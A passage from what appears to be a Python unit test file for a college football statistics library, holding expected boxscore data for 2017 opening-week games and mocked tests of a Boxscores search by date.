'away_score': 11,
'away_rank': None,
'home_name': 'Texas State',
'home_abbr': 'texas-state',
'home_score': 20,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Texas State',
'winning_abbr': 'texas-state',
'losing_name': '',
'losing_abbr': ''},
{'boxscore': '2017-09-02-texas-tech',
'away_name': 'Eastern Washington',
'away_abbr': 'Eastern Washington',
'away_score': 10,
'away_rank': None,
'home_name': 'Texas Tech',
'home_abbr': 'texas-tech',
'home_score': 56,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Texas Tech',
'winning_abbr': 'texas-tech',
'losing_name': 'Eastern Washington',
'losing_abbr': 'Eastern Washington'},
{'boxscore': '2017-09-02-tulane',
'away_name': 'Grambling State',
'away_abbr': 'Grambling State',
'away_score': 14,
'away_rank': None,
'home_name': 'Tulane',
'home_abbr': 'tulane',
'home_score': 43,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Tulane',
'winning_abbr': 'tulane',
'losing_name': 'Grambling State',
'losing_abbr': 'Grambling State'},
{'boxscore': '2017-09-02-virginia',
'away_name': 'William & Mary',
'away_abbr': 'William & Mary',
'away_score': 10,
'away_rank': None,
'home_name': 'Virginia',
'home_abbr': 'virginia',
'home_score': 28,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Virginia',
'winning_abbr': 'virginia',
'losing_name': 'William & Mary',
'losing_abbr': 'William & Mary'},
{'boxscore': '2017-09-02-washington-state',
'away_name': 'Montana State',
'away_abbr': 'Montana State',
'away_score': 0,
'away_rank': None,
'home_name': 'Washington State',
'home_abbr': 'washington-state',
'home_score': 31,
'home_rank': 24,
'non_di': True,
'top_25': True,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-western-kentucky',
'away_name': 'Eastern Kentucky',
'away_abbr': 'Eastern Kentucky',
'away_score': 17,
'away_rank': None,
'home_name': 'Western Kentucky',
'home_abbr': 'western-kentucky',
'home_score': 31,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Western Kentucky',
'winning_abbr': 'western-kentucky',
'losing_name': 'Eastern Kentucky',
'losing_abbr': 'Eastern Kentucky'},
{'boxscore': '2017-09-01-army',
'away_name': 'Fordham',
'away_abbr': 'Fordham',
'away_score': 6,
'away_rank': None,
'home_name': 'Army',
'home_abbr': 'army',
'home_score': 64,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Army',
'winning_abbr': 'army',
'losing_name': 'Fordham',
'losing_abbr': 'Fordham'},
{'boxscore': '2017-09-01-colorado',
'away_name': 'Colorado State',
'away_abbr': 'colorado-state',
'away_score': 3,
'away_rank': None,
'home_name': 'Colorado',
'home_abbr': 'colorado',
'home_score': 17,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Colorado',
'winning_abbr': 'colorado',
'losing_name': 'Colorado State',
'losing_abbr': 'colorado-state'},
{'boxscore': '2017-09-01-eastern-michigan',
'away_name': 'Charlotte',
'away_abbr': 'charlotte',
'away_score': 7,
'away_rank': None,
'home_name': 'Eastern Michigan',
'home_abbr': 'eastern-michigan',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Eastern Michigan',
'winning_abbr': 'eastern-michigan',
'losing_name': 'Charlotte',
'losing_abbr': 'charlotte'},
{'boxscore': '2017-09-01-florida-atlantic',
'away_name': 'Navy',
'away_abbr': 'navy',
'away_score': 42,
'away_rank': None,
'home_name': 'Florida Atlantic',
'home_abbr': 'florida-atlantic',
'home_score': 19,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Navy',
'winning_abbr': 'navy',
'losing_name': 'Florida Atlantic',
'losing_abbr': 'florida-atlantic'},
{'boxscore': '2017-09-01-northern-illinois',
'away_name': 'Boston College',
'away_abbr': 'boston-college',
'away_score': 23,
'away_rank': None,
'home_name': 'Northern Illinois',
'home_abbr': 'northern-illinois',
'home_score': 20,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Boston College',
'winning_abbr': 'boston-college',
'losing_name': 'Northern Illinois',
'losing_abbr': 'northern-illinois'},
{'boxscore': '2017-09-01-rutgers',
'away_name': 'Washington',
'away_abbr': 'washington',
'away_score': 30,
'away_rank': 8,
'home_name': 'Rutgers',
'home_abbr': 'rutgers',
'home_score': 14,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Washington',
'winning_abbr': 'washington',
'losing_name': 'Rutgers',
'losing_abbr': 'rutgers'},
{'boxscore': '2017-09-01-syracuse',
'away_name': 'Central Connecticut State',
'away_abbr': 'Central Connecticut State',
'away_score': 7,
'away_rank': None,
'home_name': 'Syracuse',
'home_abbr': 'syracuse',
'home_score': 50,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Syracuse',
'winning_abbr': 'syracuse',
'losing_name': 'Central Connecticut State',
'losing_abbr': 'Central Connecticut State'},
{'boxscore': '2017-09-01-wisconsin',
'away_name': 'Utah State',
'away_abbr': 'utah-state',
'away_score': 10,
'away_rank': None,
'home_name': 'Wisconsin',
'home_abbr': 'wisconsin',
'home_score': 59,
'home_rank': 9,
'non_di': False,
'top_25': True,
'winning_name': 'Wisconsin',
'winning_abbr': 'wisconsin',
'losing_name': 'Utah State',
'losing_abbr': 'utah-state'},
{'boxscore': '2017-08-31-arizona-state',
'away_name': 'New Mexico State',
'away_abbr': 'new-mexico-state',
'away_score': 31,
'away_rank': None,
'home_name': 'Arizona State',
'home_abbr': 'arizona-state',
'home_score': 37,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Arizona State',
'winning_abbr': 'arizona-state',
'losing_name': 'New Mexico State',
'losing_abbr': 'new-mexico-state'},
{'boxscore': '2017-08-31-arkansas',
'away_name': 'Florida A&M',
'away_abbr': 'Florida A&M',
'away_score': 7,
'away_rank': None,
'home_name': 'Arkansas',
'home_abbr': 'arkansas',
'home_score': 49,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Arkansas',
'winning_abbr': 'arkansas',
'losing_name': 'Florida A&M',
'losing_abbr': 'Florida A&M'},
{'boxscore': '2017-08-31-central-michigan',
'away_name': 'Rhode Island',
'away_abbr': 'Rhode Island',
'away_score': 27,
'away_rank': None,
'home_name': 'Central Michigan',
'home_abbr': 'central-michigan',
'home_score': 30,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Central Michigan',
'winning_abbr': 'central-michigan',
'losing_name': 'Rhode Island',
'losing_abbr': 'Rhode Island'},
{'boxscore': '2017-08-31-cincinnati',
'away_name': 'Austin Peay',
'away_abbr': 'Austin Peay',
'away_score': 14,
'away_rank': None,
'home_name': 'Cincinnati',
'home_abbr': 'cincinnati',
'home_score': 26,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Cincinnati',
'winning_abbr': 'cincinnati',
'losing_name': 'Austin Peay',
'losing_abbr': 'Austin Peay'},
{'boxscore': '2017-08-31-connecticut',
'away_name': 'Holy Cross',
'away_abbr': 'Holy Cross',
'away_score': 20,
'away_rank': None,
'home_name': 'Connecticut',
'home_abbr': 'connecticut',
'home_score': 27,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Connecticut',
'winning_abbr': 'connecticut',
'losing_name': 'Holy Cross',
'losing_abbr': 'Holy Cross'},
{'boxscore': '2017-08-31-georgia-state',
'away_name': 'Tennessee State',
'away_abbr': 'Tennessee State',
'away_score': 17,
'away_rank': None,
'home_name': 'Georgia State',
'home_abbr': 'georgia-state',
'home_score': 10,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Tennessee State',
'winning_abbr': 'Tennessee State',
'losing_name': 'Georgia State',
'losing_abbr': 'georgia-state'},
{'boxscore': '2017-08-31-idaho',
'away_name': 'Sacramento State',
'away_abbr': 'Sacramento State',
'away_score': 6,
'away_rank': None,
'home_name': 'Idaho',
'home_abbr': 'idaho',
'home_score': 28,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Idaho',
'winning_abbr': 'idaho',
'losing_name': 'Sacramento State',
'losing_abbr': 'Sacramento State'},
{'boxscore': '2017-08-31-indiana',
'away_name': 'Ohio State',
'away_abbr': 'ohio-state',
'away_score': 49,
'away_rank': 2,
'home_name': 'Indiana',
'home_abbr': 'indiana',
'home_score': 21,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Ohio State',
'winning_abbr': 'ohio-state',
'losing_name': 'Indiana',
'losing_abbr': 'indiana'},
{'boxscore': '2017-08-31-memphis',
'away_name': 'Louisiana-Monroe',
'away_abbr': 'louisiana-monroe',
'away_score': 29,
'away_rank': None,
'home_name': 'Memphis',
'home_abbr': 'memphis',
'home_score': 37,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Memphis',
'winning_abbr': 'memphis',
'losing_name': 'Louisiana-Monroe',
'losing_abbr': 'louisiana-monroe'},
{'boxscore': '2017-08-31-minnesota',
'away_name': 'Buffalo',
'away_abbr': 'buffalo',
'away_score': 7,
'away_rank': None,
'home_name': 'Minnesota',
'home_abbr': 'minnesota',
'home_score': 17,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Minnesota',
'winning_abbr': 'minnesota',
'losing_name': 'Buffalo',
'losing_abbr': 'buffalo'},
{'boxscore': '2017-08-31-toledo',
'away_name': 'Elon',
'away_abbr': 'Elon',
'away_score': 13,
'away_rank': None,
'home_name': 'Toledo',
'home_abbr': 'toledo',
'home_score': 47,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Toledo',
'winning_abbr': 'toledo',
'losing_name': 'Elon',
'losing_abbr': 'Elon'},
{'boxscore': '2017-08-31-utah',
'away_name': 'North Dakota',
'away_abbr': 'North Dakota',
'away_score': 16,
'away_rank': None,
'home_name': 'Utah',
'home_abbr': 'utah',
'home_score': 37,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Utah',
'winning_abbr': 'utah',
'losing_name': 'North Dakota',
'losing_abbr': 'North Dakota'},
{'boxscore': '2017-08-31-wake-forest',
'away_name': 'Presbyterian',
'away_abbr': 'Presbyterian',
'away_score': 7,
'away_rank': None,
'home_name': 'Wake Forest',
'home_abbr': 'wake-forest',
'home_score': 51,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Wake Forest',
'winning_abbr': 'wake-forest',
'losing_name': 'Presbyterian',
'losing_abbr': 'Presbyterian'}
]
}
@mock.patch('requests.get', side_effect=mock_pyquery)
def test_boxscores_search(self, *args, **kwargs):
result = Boxscores(datetime(2017, 8, 30)).games
assert result == self.expected
@mock.patch('requests.get', side_effect=mock_pyquery)
def test_boxscores_search_invalid_end(self, *args, **kwargs):
result = Boxscores(datetime(2017, 8, 30), datetime(2017, 8, 29)).games
assert result == self.expected
@mock.patch('requests.get', side_effect=mock_pyquery)
def test_boxscores_search_multiple_days(self, *args, **kwargs):
expected = {
'8-30-2017': [
{'boxscore': '2017-09-04-georgia-tech',
'away_name': 'Tennessee',
'away_abbr': 'tennessee',
'away_score': 42,
'away_rank': 25,
'home_name': 'Georgia Tech',
'home_abbr': 'georgia-tech',
'home_score': 41,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Tennessee',
'winning_abbr': 'tennessee',
'losing_name': 'Georgia Tech',
'losing_abbr': 'georgia-tech'},
{'boxscore': '2017-09-03-ucla',
'away_name': 'Texas A&M',
'away_abbr': 'texas-am',
'away_score': 44,
'away_rank': None,
'home_name': 'UCLA',
'home_abbr': 'ucla',
'home_score': 45,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'UCLA',
'winning_abbr': 'ucla',
'losing_name': 'Texas A&M',
'losing_abbr': 'texas-am'},
{'boxscore': '2017-09-03-virginia-tech',
'away_name': 'West Virginia',
'away_abbr': 'west-virginia',
'away_score': 24,
'away_rank': 22,
'home_name': 'Virginia Tech',
'home_abbr': 'virginia-tech',
'home_score': 31,
'home_rank': 21,
'non_di': False,
'top_25': True,
'winning_name': 'Virginia Tech',
'winning_abbr': 'virginia-tech',
'losing_name': 'West Virginia',
'losing_abbr': 'west-virginia'},
{'boxscore': '2017-09-02-air-force',
'away_name': 'Virginia Military Institute',
'away_abbr': 'Virginia Military Institute',
'away_score': 0,
'away_rank': None,
'home_name': 'Air Force',
'home_abbr': 'air-force',
'home_score': 62,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-alabama-birmingham',
'away_name': 'Alabama A&M',
'away_abbr': 'Alabama A&M',
'away_score': 7,
'away_rank': None,
'home_name': 'UAB',
'home_abbr': 'alabama-birmingham',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'UAB',
'winning_abbr': 'alabama-birmingham',
'losing_name': 'Alabama A&M',
'losing_abbr': 'Alabama A&M'},
{'boxscore': '2017-09-02-arizona',
'away_name': 'Northern Arizona',
'away_abbr': 'Northern Arizona',
'away_score': 24,
'away_rank': None,
'home_name': 'Arizona',
'home_abbr': 'arizona',
'home_score': 62,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Arizona',
'winning_abbr': 'arizona',
'losing_name': 'Northern Arizona',
'losing_abbr': 'Northern Arizona'},
{'boxscore': '2017-09-02-auburn',
'away_name': 'Georgia Southern',
'away_abbr': 'georgia-southern',
'away_score': 7,
'away_rank': None,
'home_name': 'Auburn',
'home_abbr': 'auburn',
'home_score': 41,
'home_rank': 12,
'non_di': False,
'top_25': True,
'winning_name': 'Auburn',
'winning_abbr': 'auburn',
'losing_name': 'Georgia Southern',
'losing_abbr': 'georgia-southern'},
{'boxscore': '2017-09-02-baylor',
'away_name': 'Liberty',
'away_abbr': 'Liberty',
'away_score': 48,
'away_rank': None,
'home_name': 'Baylor',
'home_abbr': 'baylor',
'home_score': 45,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Liberty',
'winning_abbr': 'Liberty',
'losing_name': 'Baylor',
'losing_abbr': 'baylor'},
{'boxscore': '2017-09-02-boise-state',
'away_name': 'Troy',
'away_abbr': 'troy',
'away_score': 13,
'away_rank': None,
'home_name': 'Boise State',
'home_abbr': 'boise-state',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Boise State',
'winning_abbr': 'boise-state',
'losing_name': 'Troy',
'losing_abbr': 'troy'},
{'boxscore': '2017-09-02-brigham-young',
'away_name': 'LSU',
'away_abbr': 'louisiana-state',
'away_score': 27,
'away_rank': 13,
'home_name': 'Brigham Young',
'home_abbr': 'brigham-young',
'home_score': 0,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-central-florida',
'away_name': 'Florida International',
'away_abbr': 'florida-international',
'away_score': 17,
'away_rank': None,
'home_name': 'UCF',
'home_abbr': 'central-florida',
'home_score': 61,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'UCF',
'winning_abbr': 'central-florida',
'losing_name': 'Florida International',
'losing_abbr': 'florida-international'},
{'boxscore': '2017-09-02-clemson',
'away_name': 'Kent State',
'away_abbr': 'kent-state',
'away_score': 3,
'away_rank': None,
'home_name': 'Clemson',
'home_abbr': 'clemson',
'home_score': 56,
'home_rank': 5,
'non_di': False,
'top_25': True,
'winning_name': 'Clemson',
'winning_abbr': 'clemson',
'losing_name': 'Kent State',
'losing_abbr': 'kent-state'},
{'boxscore': '2017-09-02-coastal-carolina',
'away_name': 'Massachusetts',
'away_abbr': 'massachusetts',
'away_score': 28,
'away_rank': None,
'home_name': 'Coastal Carolina',
'home_abbr': 'coastal-carolina',
'home_score': 38,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Coastal Carolina',
'winning_abbr': 'coastal-carolina',
'losing_name': 'Massachusetts',
'losing_abbr': 'massachusetts'},
{'boxscore': '2017-09-02-duke',
'away_name': 'North Carolina Central',
'away_abbr': 'North Carolina Central',
'away_score': 7,
'away_rank': None,
'home_name': 'Duke',
'home_abbr': 'duke',
'home_score': 60,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Duke',
'winning_abbr': 'duke',
'losing_name': 'North Carolina Central',
'losing_abbr': 'North Carolina Central'},
{'boxscore': '2017-09-02-east-carolina',
'away_name': 'James Madison',
'away_abbr': 'James Madison',
'away_score': 34,
'away_rank': None,
'home_name': 'East Carolina',
'home_abbr': 'east-carolina',
'home_score': 14,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'James Madison',
'winning_abbr': 'James Madison',
'losing_name': 'East Carolina',
'losing_abbr': 'east-carolina'},
{'boxscore': '2017-09-02-florida-state',
'away_name': 'Alabama',
'away_abbr': 'alabama',
'away_score': 24,
'away_rank': 1,
'home_name': 'Florida State',
'home_abbr': 'florida-state',
'home_score': 7,
'home_rank': 3,
'non_di': False,
'top_25': True,
'winning_name': 'Alabama',
'winning_abbr': 'alabama',
'losing_name': 'Florida State',
'losing_abbr': 'florida-state'},
{'boxscore': '2017-09-02-fresno-state',
'away_name': 'Incarnate Word',
'away_abbr': 'Incarnate Word',
'away_score': 0,
'away_rank': None,
'home_name': 'Fresno State',
'home_abbr': 'fresno-state',
'home_score': 66,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-georgia',
'away_name': 'Appalachian State',
'away_abbr': 'appalachian-state',
'away_score': 10,
'away_rank': None,
'home_name': 'Georgia',
'home_abbr': 'georgia',
'home_score': 31,
'home_rank': 15,
'non_di': False,
'top_25': True,
'winning_name': 'Georgia',
'winning_abbr': 'georgia',
'losing_name': 'Appalachian State',
'losing_abbr': 'appalachian-state'},
{'boxscore': '2017-09-02-hawaii',
'away_name': 'Western Carolina',
'away_abbr': 'Western Carolina',
'away_score': 18,
'away_rank': None,
'home_name': 'Hawaii',
'home_abbr': 'hawaii',
'home_score': 41,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Hawaii',
'winning_abbr': 'hawaii',
'losing_name': 'Western Carolina',
'losing_abbr': 'Western Carolina'},
{'boxscore': '2017-09-02-illinois',
'away_name': 'Ball State',
'away_abbr': 'ball-state',
'away_score': 21,
'away_rank': None,
'home_name': 'Illinois',
'home_abbr': 'illinois',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Illinois',
'winning_abbr': 'illinois',
'losing_name': 'Ball State',
'losing_abbr': 'ball-state'},
{'boxscore': '2017-09-02-iowa',
'away_name': 'Wyoming',
'away_abbr': 'wyoming',
'away_score': 3,
'away_rank': None,
'home_name': 'Iowa',
'home_abbr': 'iowa',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Iowa',
'winning_abbr': 'iowa',
'losing_name': 'Wyoming',
'losing_abbr': 'wyoming'},
{'boxscore': '2017-09-02-iowa-state',
'away_name': 'Northern Iowa',
'away_abbr': 'Northern Iowa',
'away_score': 24,
'away_rank': None,
'home_name': 'Iowa State',
'home_abbr': 'iowa-state',
'home_score': 42,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Iowa State',
'winning_abbr': 'iowa-state',
'losing_name': 'Northern Iowa',
'losing_abbr': 'Northern Iowa'},
{'boxscore': '2017-09-02-kansas',
'away_name': 'Southeast Missouri State',
'away_abbr': 'Southeast Missouri State',
'away_score': 16,
'away_rank': None,
'home_name': 'Kansas',
'home_abbr': 'kansas',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Kansas',
'winning_abbr': 'kansas',
'losing_name': 'Southeast Missouri State',
'losing_abbr': 'Southeast Missouri State'},
{'boxscore': '2017-09-02-kansas-state',
'away_name': 'Central Arkansas',
'away_abbr': 'Central Arkansas',
'away_score': 19,
'away_rank': None,
'home_name': 'Kansas State',
'home_abbr': 'kansas-state',
'home_score': 55,
'home_rank': 20,
'non_di': True,
'top_25': True,
'winning_name': 'Kansas State',
'winning_abbr': 'kansas-state',
'losing_name': 'Central Arkansas',
'losing_abbr': 'Central Arkansas'},
{'boxscore': '2017-09-02-louisiana-lafayette',
'away_name': 'Southeastern Louisiana',
'away_abbr': 'Southeastern Louisiana',
'away_score': 48,
'away_rank': None,
'home_name': 'Louisiana',
'home_abbr': 'louisiana-lafayette',
'home_score': 51,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Louisiana',
'winning_abbr': 'louisiana-lafayette',
'losing_name': 'Southeastern Louisiana',
'losing_abbr': 'Southeastern Louisiana'},
{'boxscore': '2017-09-02-louisiana-tech',
'away_name': 'Northwestern State',
'away_abbr': 'Northwestern State',
'away_score': 24,
'away_rank': None,
'home_name': 'Louisiana Tech',
'home_abbr': 'louisiana-tech',
'home_score': 52,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Louisiana Tech',
'winning_abbr': 'louisiana-tech',
'losing_name': 'Northwestern State',
'losing_abbr': 'Northwestern State'},
{'boxscore': '2017-09-02-marshall',
'away_name': 'Miami (OH)',
'away_abbr': 'miami-oh',
'away_score': 26,
'away_rank': None,
'home_name': 'Marshall',
'home_abbr': 'marshall',
'home_score': 31,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Marshall',
'winning_abbr': 'marshall',
'losing_name': 'Miami (OH)',
'losing_abbr': 'miami-oh'},
{'boxscore': '2017-09-02-miami-fl',
'away_name': 'Bethune-Cookman',
'away_abbr': 'Bethune-Cookman',
'away_score': 13,
'away_rank': None,
'home_name': 'Miami (FL)',
'home_abbr': 'miami-fl',
'home_score': 41,
'home_rank': 18,
'non_di': True,
'top_25': True,
'winning_name': 'Miami (FL)',
'winning_abbr': 'miami-fl',
'losing_name': 'Bethune-Cookman',
'losing_abbr': 'Bethune-Cookman'},
{'boxscore': '2017-09-02-michigan',
'away_name': 'Florida',
'away_abbr': 'florida',
'away_score': 17,
'away_rank': 17,
'home_name': 'Michigan',
'home_abbr': 'michigan',
'home_score': 33,
'home_rank': 11,
'non_di': False,
'top_25': True,
'winning_name': 'Michigan',
'winning_abbr': 'michigan',
'losing_name': 'Florida',
'losing_abbr': 'florida'},
{'boxscore': '2017-09-02-michigan-state',
'away_name': 'Bowling Green State',
'away_abbr': 'bowling-green-state',
'away_score': 10,
'away_rank': None,
'home_name': 'Michigan State',
'home_abbr': 'michigan-state',
'home_score': 35,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Michigan State',
'winning_abbr': 'michigan-state',
'losing_name': 'Bowling Green State',
'losing_abbr': 'bowling-green-state'},
{'boxscore': '2017-09-02-middle-tennessee-state',
'away_name': 'Vanderbilt',
'away_abbr': 'vanderbilt',
'away_score': 28,
'away_rank': None,
'home_name': 'Middle Tennessee State',
'home_abbr': 'middle-tennessee-state',
'home_score': 6,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Vanderbilt',
'winning_abbr': 'vanderbilt',
'losing_name': 'Middle Tennessee State',
'losing_abbr': 'middle-tennessee-state'},
{'boxscore': '2017-09-02-mississippi',
'away_name': 'South Alabama',
'away_abbr': 'south-alabama',
'away_score': 27,
'away_rank': None,
'home_name': 'Ole Miss',
'home_abbr': 'mississippi',
'home_score': 47,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Ole Miss',
'winning_abbr': 'mississippi',
'losing_name': 'South Alabama',
'losing_abbr': 'south-alabama'},
{'boxscore': '2017-09-02-mississippi-state',
'away_name': 'Charleston Southern',
'away_abbr': 'Charleston Southern',
'away_score': 0,
'away_rank': None,
'home_name': 'Mississippi State',
'home_abbr': 'mississippi-state',
'home_score': 49,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-missouri',
'away_name': 'Missouri State',
'away_abbr': 'Missouri State',
'away_score': 43,
'away_rank': None,
'home_name': 'Missouri',
'home_abbr': 'missouri',
'home_score': 72,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Missouri',
'winning_abbr': 'missouri',
'losing_name': 'Missouri State',
'losing_abbr': 'Missouri State'},
{'boxscore': '2017-09-02-nebraska',
'away_name': 'Arkansas State',
'away_abbr': 'arkansas-state',
'away_score': 36,
'away_rank': None,
'home_name': 'Nebraska',
'home_abbr': 'nebraska',
'home_score': 43,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Nebraska',
'winning_abbr': 'nebraska',
'losing_name': 'Arkansas State',
'losing_abbr': 'arkansas-state'},
{'boxscore': '2017-09-02-nevada-las-vegas',
'away_name': 'Howard',
'away_abbr': 'Howard',
'away_score': 43,
'away_rank': None,
'home_name': 'UNLV',
'home_abbr': 'nevada-las-vegas',
'home_score': 40,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Howard',
'winning_abbr': 'Howard',
'losing_name': 'UNLV',
'losing_abbr': 'nevada-las-vegas'},
{'boxscore': '2017-09-02-new-mexico',
'away_name': 'Abilene Christian',
'away_abbr': 'Abilene Christian',
'away_score': 14,
'away_rank': None,
'home_name': 'New Mexico',
'home_abbr': 'new-mexico',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'New Mexico',
'winning_abbr': 'new-mexico',
'losing_name': 'Abilene Christian',
'losing_abbr': 'Abilene Christian'},
{'boxscore': '2017-09-02-north-carolina',
'away_name': 'California',
'away_abbr': 'california',
'away_score': 35,
'away_rank': None,
'home_name': 'North Carolina',
'home_abbr': 'north-carolina',
'home_score': 30,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'California',
'winning_abbr': 'california',
'losing_name': 'North Carolina',
'losing_abbr': 'north-carolina'},
{'boxscore': '2017-09-02-north-carolina-state',
'away_name': 'South Carolina',
'away_abbr': 'south-carolina',
'away_score': 35,
'away_rank': None,
'home_name': 'North Carolina State',
'home_abbr': 'north-carolina-state',
'home_score': 28,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'South Carolina',
'winning_abbr': 'south-carolina',
'losing_name': 'North Carolina State',
'losing_abbr': 'north-carolina-state'},
{'boxscore': '2017-09-02-north-texas',
'away_name': 'Lamar',
'away_abbr': 'Lamar',
'away_score': 14,
'away_rank': None,
'home_name': 'North Texas',
'home_abbr': 'north-texas',
'home_score': 59,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'North Texas',
'winning_abbr': 'north-texas',
'losing_name': 'Lamar',
'losing_abbr': 'Lamar'},
{'boxscore': '2017-09-02-northwestern',
'away_name': 'Nevada',
'away_abbr': 'nevada',
'away_score': 20,
'away_rank': None,
'home_name': 'Northwestern',
'home_abbr': 'northwestern',
'home_score': 31,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Northwestern',
'winning_abbr': 'northwestern',
'losing_name': 'Nevada',
'losing_abbr': 'nevada'},
{'boxscore': '2017-09-02-notre-dame',
'away_name': 'Temple',
'away_abbr': 'temple',
'away_score': 16,
'away_rank': None,
'home_name': 'Notre Dame',
'home_abbr': 'notre-dame',
'home_score': 49,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Notre Dame',
'winning_abbr': 'notre-dame',
'losing_name': 'Temple',
'losing_abbr': 'temple'},
{'boxscore': '2017-09-02-ohio',
'away_name': 'Hampton',
'away_abbr': 'Hampton',
'away_score': 0,
'away_rank': None,
'home_name': 'Ohio',
'home_abbr': 'ohio',
'home_score': 59,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-oklahoma',
'away_name': 'UTEP',
'away_abbr': 'texas-el-paso',
'away_score': 7,
'away_rank': None,
'home_name': 'Oklahoma',
'home_abbr': 'oklahoma',
'home_score': 56,
'home_rank': 7,
'non_di': False,
'top_25': True,
'winning_name': 'Oklahoma',
'winning_abbr': 'oklahoma',
'losing_name': 'UTEP',
'losing_abbr': 'texas-el-paso'},
{'boxscore': '2017-09-02-oklahoma-state',
'away_name': 'Tulsa',
'away_abbr': 'tulsa',
'away_score': 24,
'away_rank': None,
'home_name': 'Oklahoma State',
'home_abbr': 'oklahoma-state',
'home_score': 59,
'home_rank': 10,
'non_di': False,
'top_25': True,
'winning_name': 'Oklahoma State',
'winning_abbr': 'oklahoma-state',
'losing_name': 'Tulsa',
'losing_abbr': 'tulsa'},
{'boxscore': '2017-09-02-old-dominion',
'away_name': 'Albany',
'away_abbr': 'Albany',
'away_score': 17,
'away_rank': None,
'home_name': 'Old Dominion',
'home_abbr': 'old-dominion',
'home_score': 31,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Old Dominion',
'winning_abbr': 'old-dominion',
'losing_name': 'Albany',
'losing_abbr': 'Albany'},
{'boxscore': '2017-09-02-oregon',
'away_name': 'Southern Utah',
'away_abbr': 'Southern Utah',
'away_score': 21,
'away_rank': None,
'home_name': 'Oregon',
'home_abbr': 'oregon',
'home_score': 77,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Oregon',
'winning_abbr': 'oregon',
'losing_name': 'Southern Utah',
'losing_abbr': 'Southern Utah'},
{'boxscore': '2017-09-02-oregon-state',
'away_name': 'Portland State',
'away_abbr': 'Portland State',
'away_score': 32,
'away_rank': None,
'home_name': 'Oregon State',
'home_abbr': 'oregon-state',
'home_score': 35,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Oregon State',
'winning_abbr': 'oregon-state',
'losing_name': 'Portland State',
'losing_abbr': 'Portland State'},
{'boxscore': '2017-09-02-penn-state',
